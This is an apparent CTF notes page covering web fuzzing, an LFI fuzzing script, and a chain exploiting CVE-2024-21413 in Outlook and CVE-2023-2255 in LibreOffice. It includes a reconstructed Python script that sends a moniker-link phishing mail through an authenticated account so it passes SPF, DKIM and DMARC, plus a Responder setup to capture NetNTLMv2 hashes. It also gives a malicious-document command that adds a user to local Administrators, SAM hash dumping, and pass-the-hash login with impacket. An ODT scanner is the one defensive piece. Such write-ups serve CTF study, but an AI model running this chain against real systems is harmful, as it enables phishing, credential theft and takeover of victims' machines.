CTF Notes: 2024-05-05 CVE-2024-21413 CVE-2023-2255
Common web fuzzing cmd
- general path search
> dirsearch -u http://target -x 403,404
- find available parameters
> wfuzz -w /usr/share/wordlists/dirb/common.txt -u "http://target/file.php?FUZZ=test"
- testing for possible LFI (path traversal through a file parameter); a handy lightweight wordlist to use: https://github.com/Karanxa/Bug-Bounty-Wordlists (hide the baseline "not found" response size with --hh so only real hits remain)
> wfuzz -w /usr/share/wordlists/Bug-Bounty-Wordlists/windows-lfi.txt -u "http://target/file.php?file=../../../FUZZ"
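The same LFI check as a small script, added here as an example (not part of the original notes or of wfuzz): every wordlist entry is sent behind a traversal prefix, and a hit is reported either when a known file marker appears in the body or when the response differs from a "no such file" baseline. The target URL, parameter name and `stub_fetch` responses are constructed for offline testing; `default_fetch` is the real HTTP path.

```python
import urllib.parse
import urllib.request
from typing import Dict, List, Optional

# Marker strings that identify a successfully included file (Windows and Linux).
MARKERS = {
    "win.ini": "[fonts]",
    "boot.ini": "[boot loader]",
    "etc/passwd": "root:x:0:0",
    "etc/hosts": "127.0.0.1",
}


def default_fetch(url: str) -> str:
    """Plain HTTP GET; any error is treated as an empty body."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    except Exception:
        return ""


def marker_for(entry: str) -> Optional[str]:
    """Return the content marker for a wordlist entry, if we know one."""
    normalised = entry.replace("\\", "/").lower()
    for suffix, marker in MARKERS.items():
        if normalised.endswith(suffix):
            return marker
    return None


def build_url(base_url: str, param: str, payload: str) -> str:
    # Keep "/" unencoded: most traversal filters key on the literal "../".
    return f"{base_url}?{param}={urllib.parse.quote(payload, safe='/')}"


def fuzz_lfi(base_url, param, wordlist, fetch=default_fetch, prefix="../../../"):
    """Try every wordlist entry behind the traversal prefix; return the hits."""
    # Baseline: a path that certainly does not exist, so we learn what
    # "file not found" looks like on this target before comparing.
    baseline = fetch(build_url(base_url, param, prefix + "zz_no_such_file_zz"))
    hits: List[Dict[str, str]] = []
    for entry in wordlist:
        entry = entry.strip()
        if not entry:
            continue
        body = fetch(build_url(base_url, param, prefix + entry))
        marker = marker_for(entry)
        if marker and marker in body:
            hits.append({"entry": entry, "reason": f"marker {marker!r} found"})
        elif body and body != baseline and len(body) != len(baseline):
            hits.append({"entry": entry, "reason": "response differs from baseline"})
    return hits


def stub_fetch(url: str) -> str:
    """Constructed stand-in for a vulnerable target (assumption, for offline use)."""
    if "windows/win.ini" in url.lower():
        return "; for 16-bit app support\n[fonts]\n[extensions]\n"
    if "etc/passwd" in url:
        return "root:x:0:0:root:/root:/bin/bash\n"
    return "Warning: include(): failed to open stream\n"


if __name__ == "__main__":
    sample = ["windows/win.ini", "etc/passwd", "nope.txt"]
    for hit in fuzz_lfi("http://target/file.php", "file", sample, fetch=stub_fetch):
        print(hit)
```

Against a live target, pass a real wordlist (for example the windows-lfi.txt file above, read line by line) and leave `fetch` at its default; the baseline comparison is what keeps a target that returns 200 for everything from flooding the output.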
CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability PoC
This script needs SMTP credentials: sending through an authenticated account makes the message pass SPF, DKIM and DMARC checks instead of being dropped as spoofed, which simulates a real phishing delivery more closely. The --url value is the UNC path of your listener; when the victim clicks the link, Outlook connects to it over SMB and the NetNTLMv2 hash lands in Responder, so start Responder on the interface facing the target before sending.
> responder -I <eth>
> python3 CVE-2024-21413.py --server target --port 587 --username user@target --password passwd --sender user@domain --recipient victim@target --url '\\kali' --subject XD
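What the PoC script actually puts in the mail, written out as an added example (this is not the referenced CVE-2024-21413.py, just a minimal reconstruction of the technique): a `file://` UNC link with a trailing `!` so Outlook treats it as a moniker link and skips the Protected View prompt. The listener host `kali`, share and file names, and the SMTP STARTTLS submission are assumptions.

```python
import smtplib
from email.message import EmailMessage


def moniker_link(listener_host: str, share: str = "share",
                 filename: str = "test.rtf", tail: str = "x") -> str:
    """UNC file:// link with the trailing "!" that turns it into a moniker link.

    Without the "!", Outlook shows the Protected View warning for the
    file:// URL; with it, the link is handed to the COM moniker machinery
    and the SMB connection to listener_host happens on click, which is
    what leaks NetNTLMv2 to Responder. Share and file name are assumed.
    """
    return f"file:///\\\\{listener_host}\\{share}\\{filename}!{tail}"


def build_message(sender: str, recipient: str, subject: str, listener_host: str):
    """HTML mail carrying the moniker link, with a plain-text fallback part."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    href = moniker_link(listener_host)
    msg.set_content("Please open the linked report.")
    msg.add_alternative(
        f'<html><body><p><a href="{href}">Open report</a></p></body></html>',
        subtype="html")
    return msg


def send_authenticated(msg, server: str, port: int, username: str, password: str):
    """Submit through an authenticated account so the mail passes SPF/DKIM/DMARC."""
    with smtplib.SMTP(server, port, timeout=30) as smtp:
        smtp.starttls()
        smtp.login(username, password)
        smtp.send_message(msg)


if __name__ == "__main__":
    message = build_message("user@domain", "victim@target", "XD", "kali")
    print(message.as_string())
    # send_authenticated(message, "target", 587, "user@target", "passwd")
```

Whether the click leaks a hash is decided by the listener side: Responder must already be bound to the interface the target will reach before the mail goes out.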
CVE-2023-2255
Improper access control in the editor components of The Document Foundation LibreOffice allowed an attacker to craft a document that caused external links to be loaded without a prompt. In affected versions, documents that used "floating frames" linked to external files loaded the contents of those frames without asking the user for permission, which was inconsistent with how LibreOffice treats other linked content. Affected: LibreOffice 7.4 versions prior to 7.4.7 and 7.5 versions prior to 7.5.3.
- on kali: generate the document (the local group is Administrators, not Administrator; the command runs in the context of whoever opens the file)
> python3 CVE-2023-2255.py --cmd 'net localgroup Administrators user /add' --output 'test.odt'
- on the target: fetch the document (in PowerShell, wget is an alias for Invoke-WebRequest) and open it in a vulnerable LibreOffice
> wget http://kali/test.odt -O "c:\path\test.odt"
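The defensive counterpart of the step above, added as an example (not from the notes or from the PoC): an ODT is a zip with a content.xml, and the CVE-2023-2255 vector is a draw:floating-frame whose xlink:href points outside the document. The scanner lists those hrefs and their scheme; `make_sample_odt` builds a constructed minimal document so the check runs offline. The sample URL is an assumption.

```python
import io
import zipfile
from urllib.parse import urlsplit
from xml.sax.saxutils import escape
import xml.etree.ElementTree as ET  # for untrusted input in production, prefer defusedxml

# OpenDocument namespaces used in content.xml.
NS = {
    "office": "urn:oasis:names:tc:opendocument:xmlns:office:1.0",
    "text": "urn:oasis:names:tc:opendocument:xmlns:text:1.0",
    "draw": "urn:oasis:names:tc:opendocument:xmlns:drawing:1.0",
    "xlink": "http://www.w3.org/1999/xlink",
}


def floating_frame_links(odt_bytes: bytes):
    """Return every xlink:href carried by a draw:floating-frame in content.xml."""
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as z:
        root = ET.fromstring(z.read("content.xml"))
    tag = "{%s}floating-frame" % NS["draw"]
    attr = "{%s}href" % NS["xlink"]
    return [frame.get(attr) for frame in root.iter(tag) if frame.get(attr)]


def link_scheme(href: str) -> str:
    """'' for relative paths, otherwise the scheme (http, smb, vnd.sun.star.script, ...)."""
    return urlsplit(href).scheme.lower()


def make_sample_odt(href=None) -> bytes:
    """Constructed minimal ODT; with href, it carries one linked floating frame."""
    frame = ""
    if href:
        safe = escape(href, {'"': "&quot;"})
        frame = f'<draw:frame><draw:floating-frame xlink:href="{safe}"/></draw:frame>'
    content = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<office:document-content xmlns:office="{NS["office"]}" '
        f'xmlns:text="{NS["text"]}" xmlns:draw="{NS["draw"]}" xmlns:xlink="{NS["xlink"]}">'
        f"<office:body><office:text><text:p>{frame}</text:p></office:text></office:body>"
        "</office:document-content>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        # ODF requires the mimetype entry first and uncompressed.
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text",
                   compress_type=zipfile.ZIP_STORED)
        z.writestr("content.xml", content, compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else make_sample_odt("http://kali/payload.html")
    for href in floating_frame_links(data):
        print(f"floating frame -> {href!r} (scheme: {link_scheme(href) or 'relative'})")
```

Any floating frame with an external link is worth a look on a host running an affected 7.4/7.5 build, since the whole point of the CVE is that LibreOffice fetched it without asking; an absolute scheme pointing off-host is the obvious red flag.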
- once the user is in the local Administrators group, dump the SAM hashes with that user's credentials and pass the hash to log in as the built-in admin (-hashes takes LMHASH:NTHASH; aad3b435b51404eeaad3b435b51404ee is the empty LM hash)
> crackmapexec smb target -u user -p pass --sam
[*] Initializing FTP protocol database
SMB target 445 target [*] Windows 10.0 Build 19041 x64 (name:target) (domain:target) (signing:False) (SMBv1:False)
SMB target 445 target [+] target\user:pass (Pwn3d!)
SMB target 445 target [+] Dumping SAM hashes
SMB target 445 target admin1:500:aad3b435b51404eeaad3b435b51404ee:asdfasdfasdfasdfasdfasdfasdfasdf:::
SMB target 445 target admin2:501:aad3b435b51404eeaad3b435b51404ee:asdfasdfasdfasdfasdfasdfasdfasdf:::
SMB target 445 target [+] Added 6 SAM hashes to the database
> impacket-wmiexec admin1@target -hashes "aad3b435b51404eeaad3b435b51404ee:asdfasdfasdfasdfasdfasdfasdfasdf"
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack